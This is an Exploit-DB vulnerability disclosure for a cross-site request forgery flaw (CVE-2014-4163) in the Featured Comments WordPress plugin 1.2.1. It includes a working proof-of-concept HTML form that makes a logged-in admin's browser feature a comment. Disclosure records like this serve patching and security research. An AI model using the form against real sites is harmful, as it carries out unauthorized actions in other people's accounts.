WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability

2014-06-10T00:00:00
ID EDB-ID:39213
Type exploitdb
Reporter Tom Adams
Modified 2014-06-10T00:00:00

Description

WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability. CVE-2014-4163. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/67955/info

Featured Comments plugin for WordPress is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Featured Comments 1.2.1 is vulnerable; other versions may also be affected. 

<form action=\"http://localhost/wp-admin/admin-ajax.php?action=feature_comments\"; method=\"POST\">
  <input type=\"text\" name=\"do\" value=\"feature\">
  <input type=\"text\" name=\"comment_id\" value=\"9\">
  <input type=\"submit\">
</form>